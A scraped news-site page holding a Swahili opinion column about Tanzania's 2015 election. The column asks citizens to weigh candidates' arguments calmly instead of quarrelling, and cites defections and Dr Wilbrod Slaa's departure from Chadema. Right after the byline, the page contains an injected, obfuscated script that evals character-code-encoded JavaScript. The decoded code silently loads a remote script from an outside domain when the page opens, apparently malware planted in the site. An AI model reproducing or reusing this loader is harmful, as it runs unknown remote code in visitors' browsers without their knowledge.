Recent Comments

Siasa siyo uadui, isiwagawe Watanzania

By Baraka Bitariho Sep 5, 2015
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

regina-kumba_210_120
MWAKA huu, kama ilivyo kila tunapofanya uchaguzi ambao tunatarajia kuwa na rais mpya, hamasa za kisiasa huongezeka. Hata hivyo, katika kipindi cha miezi hii miwili au mitatu tumeshuhudia mengi.

Baadhi yakiwa mageni tangu nchi yetu kuingia katika mfumo wa vyama vingi ambao tumedumu nao kwa zaidi ya miaka 20 sasa. Katika mchakato wa kuelekea uchaguzi mkuu tumeshuhudia mambo kadhaa ikiwa ni pamoja na uhamaji wa wanachama kutoka chama kimoja kwenda kingine.

Ni mwaka ambao tumeshuhudia waliowahi kuwa mawaziri wakuu wawili wakihama kutoka chama tawala kwenda upinzani kwa sababu ambazo wao wenyewe wanazijua, lakini chanzo ikiwa ni baada ya majina yao kukatwa walipogombea urais wa Tanzania.

Kadhalika tumeshuhudia hatua ya Waziri Mkuu aliyejiuzulu kwa kashfa ya kuleta nchini kampuni feki ya kufua umeme wa dharura ya Richmond, Edward Lowassa, akisababisha viongozi wawili wakubwa wa upinzani kujiuzulu au kutangaza kuachana na siasa.

Aliyejiuzulu ni aliyekuwa Mwenyekiti wa Chama cha Wananchi (CUF) aliyeamua kuwa mwanachama wa kawaida na aliyeacha siasa ni Katibu wa Chama cha Demokrasia na Maendeleo (Chadema), Dk Wilbrod Slaa.

Wiki hii, Dk Slaa aliamua kisimama hadharani kuwaeleza Watanzania mambo mengi yaliyomfanya kuachana na siasa ambapo ametangaza kuwa mchambuzi huru wa mambo ya siasa.

Ninachotaka kuwaambia Watanzania wenzangu ni kwamba katika kipindi hiki cha watu kutafuta kura, na baada ya yote haya kutokea, tutasikia mengi yaliyo kweli na ya uongo, yenye kujenga na yenye kubomoa. Tunachokisikia kutoka kwa wanasiasa hawa ni lazima tuchuje ili kutusaidia kujua ni nani anayefaa kutuongoza na hasa katika nafasi ya urais.

Nafasi hi ni nyeti na ina umuhimu mkubwa katika kuamua mustakabali wa maisha yetu kwani Rais tutakayemchangua ndiye atakayekwenda kuunda serikali itakayotuongoza. Ndiye ataunda baraza la mawaziri na wakuu wa taasisi mbalimbali nyeti na muhimu kwa maendeleo ya nchi yetu.

Sasa hivi kwenye mitandao ya kijamii kuna mijadala mbalimbali ya kisiasa, ikiwemo yenye kujenga na yenye kubomoa inayoendelea.

Ingawa mijadala hii baadhi inaweza kulenga kuvutia upande wa wagombea wao, lakini hofu yangu ni pale inapotumika kwa malengo ya kushambuliana, tena wakati mwingine bila kuwa na hoja za msingi. Ni mijadala ambayo wakati mwingine watu wanafikia hata kugombana kati ya mtu na mtu, mtu na ndugu au rafiki na rafiki.

Cha msingi tukumbuke kwamba sisi ni Watanzania na hatuna nchi nyingine tuliyopewa na Mwenyezi Mungu baada ya hii. Baada ya uchaguzi mkuu itakapofika Oktoba 25 mwaka huu tunapaswa kujiuliza tutaangalianaje kama sasa tumekwishagombana na kunyoosheana vidole kwa sababu ya kukosa uvumilivu wa kisiasa?

Ninajua ni haki ya mtu kuchagua kiongozi anayempenda lakini tujitahidi kusikiliza hoja kinzani na kutoingia katika ugomvi wa kisiasa na badala yake kilicho cha msingi tuendelee kusikiliza kila kinachoelezwa na wagombea, tukipime kwa umakini mkubwa na mwisho kufikia uamuzi unaofaa.

Tusianze kufunga akili zetu sasa bali tuzifungue na kusikiliza kwa uvumilivu na utulivu ili mwisho wa sikui tuchague viongozi wanaofaa. Kugombana katika vijiwe na kufanya ubishi wenye mwelekeo wa uvunjifu wa amani hautaleta mabadiliko na pia hautakua na faida yoyote kwetu na kwa nchi yetu.

Hivyo tunatakiwa kuwa na utulivu wa kusikiliza hoja zinazotolewa na kutoa nafasi kwa fikra pinzani na kisha kuchuja kwa umakini ni ipi pumba na upi mchele. Cha kuzingatia sana ni kama alivyosema Dk Slaa juzi; siasa ni suala la kushindana kwa hoja na sio uadui.

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com